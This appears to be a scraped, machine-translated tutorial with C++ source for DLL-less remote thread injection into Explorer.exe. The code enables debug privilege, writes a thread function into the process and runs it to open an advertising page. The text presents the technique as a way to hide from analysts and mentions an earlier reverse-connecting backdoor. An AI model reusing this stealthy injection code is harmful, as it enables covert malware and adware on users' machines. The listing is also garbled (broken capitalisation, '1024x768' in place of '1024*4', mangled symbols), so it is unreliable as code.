Secure Path-No DLL file for remote thread injection

Source: Internet
Author: User

Brief introduction

In the previous chapters I introduced remote thread injection and implemented a backdoor .dll injected into Explorer.exe to get a reverse-connecting backdoor past the firewall. But an .exe file always has to carry a .dll file along when it injects, which is troublesome — is there really no way to implement injection without a .dll file?
The answer is yes: we can write the functionality directly in the thread function and then inject the entire function. Compared with DLL injection this method is slightly more complex and suits small programs. But pay attention to the address-relocation problem of dynamic link libraries: a normal process typically loads only Kernel32.dll by default, and only Kernel32.dll and User32.dll can be assumed to have the same load address in the local and target processes, so it is best to call LoadLibrary and GetProcAddress manually inside the remote thread function to force the DLL to be loaded. When compiling code like this in Visual Studio it is recommended to turn off the compiler's "/GS" option; the link referred to covers other points that need attention.
Below we use this method to make Windows Explorer (Explorer.exe) open a web page (an advertisement); since our injected thread does not appear among the DLL files the program depends on, an analyst cannot find it there, which achieves a certain hiding effect.

Code implementation
filename:injectprocess.cpp//creator:peterzheng//date:2018/8/18 0:35//Comment: Inject Process without Dll file////////////////////////////////#include <cstdio> #include <cstdlib># Include <iostream> #include <string> #include <string.h> #include <windows.h> #include < strsafe.h> #include <tlhelp32.h> #define MAX_LENGTH 50#define normal_length 20#pragma Warning (disable:4996)    Using namespace std;typedef struct _remoteparam{CHAR szoperation[normal_length];    CHAR Szaddrerss[max_length];    CHAR Szlb[normal_length];    CHAR Szfunc[normal_length];    LPVOID dwmlaadress;    LPVOID dwmgpaaddress; LPVOID dwseaddress;}     Remoteparam;dword WINAPI ThreadProc (Remoteparam *lprp) {typedef hmodule (WINAPI *mloadlibrarya) (in LPCTSTR lpfilename);    typedef FARPROC (WINAPI *mgetprocaddress) (in Hmodule hmodule, in LPCSTR lpprocname); typedef hinstance (WINAPI *mshellexecutea) (HWND hwnd, LPCSTR lpoperation, LPCSTR lPFile, LPCSTR lpparameters, LPCSTR lpdirectory, INT nshowcmd);    Mloadlibrarya MLA;    Mgetprocaddress Mgpa;    Mshellexecutea MSE;    MLA = (Mloadlibrarya) lprp->dwmlaadress;    Mgpa = (mgetprocaddress) lprp->dwmgpaaddress;    Lprp->dwseaddress = (LPVOID) Mgpa (MLA (LPRP-&GT;SZLB), lprp->szfunc);    MSE = (Mshellexecutea) lprp->dwseaddress;    MSE (null, lprp->szoperation, LPRP-&GT;SZADDRERSS, NULL, NULL, SW_SHOWNORMAL); return 0;}    DWORD GetProcessID (CHAR *processname) {PROCESSENTRY32 pe32;    pe32.dwsize = sizeof (PE32);    HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0);        if (Hprocesssnap = = Invalid_handle_value) {printf ("CreateToolhelp32Snapshot error");    return 0;    } BOOL bprocess = Process32First (Hprocesssnap, &pe32); while (bprocess) {if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0) return Pe32.th32proc        EssID;    bprocess = Process32Next (Hprocesssnap, &pe32); } ClOsehandle (HPROCESSSNAP); return 0;}    int Enabledebugpriv (const TCHAR *name) {HANDLE htoken;    Token_privileges TP;    LUID 
LUID; if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges |        Token_query, &htoken) {printf ("OpenProcessToken error!\n");    return 1; } if (!        Lookupprivilegevalue (NULL, Name, &luid)) {printf ("Lookupprivilege error!\n");    return 1; } TP.    Privilegecount = 1; Tp. Privileges[0].    Attributes = se_privilege_enabled; Tp. Privileges[0].    Luid = Luid; if (!  AdjustTokenPrivileges (htoken, 0, &AMP;TP, sizeof (token_privileges), NULL, NULL)) {printf ("AdjustTokenPrivileges        Error!\n ");    return 1; } return 0;}    BOOL injectprocess (const DWORD dwpid) {if (Enabledebugpriv (se_debug_name)) return FALSE;    HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwpid);    if (!hwnd) return FALSE;    Remoteparam RP;    ZeroMemory (&AMP;RP, sizeof (Remoteparam)); Rp.dwmlaadress = (LPVOID)    GetProcAddress (LoadLibrary ("Kernel32.dll"), "LoadLibraryA");    Rp.dwmgpaaddress = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "GetProcAddress");    StringCchCopy (rp.szlb, sizeof (RP.SZLB), "Shell32.dll");    StringCchCopy (Rp.szfunc, sizeof (Rp.szfunc), "Shellexecutea");    StringCchCopy (Rp.szaddrerss, sizeof (RP.SZADDRERSS), "https://www.baidu.com");    StringCchCopy (rp.szoperation, sizeof (rp.szoperation), "open"); Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premoteparam) return FALSE; if (!    WriteProcessMemory (HWnd, Premoteparam, &AMP;RP, sizeof (Remoteparam), 0)) return FALSE; LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premotethread) return FALSE; if (!    
WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE; HANDLE hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL);    if (!hthread) return FALSE; return TRUE;}    int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcmd) {    CHAR Szprocname[max_length] = "n";    StringCchCopy (Szprocname, Max_length, "Explorer.exe");    Injectprocess (GetProcessID (szprocname));    ExitProcess (0); return 0;}

Secure Path-no DLL file for remote thread injection
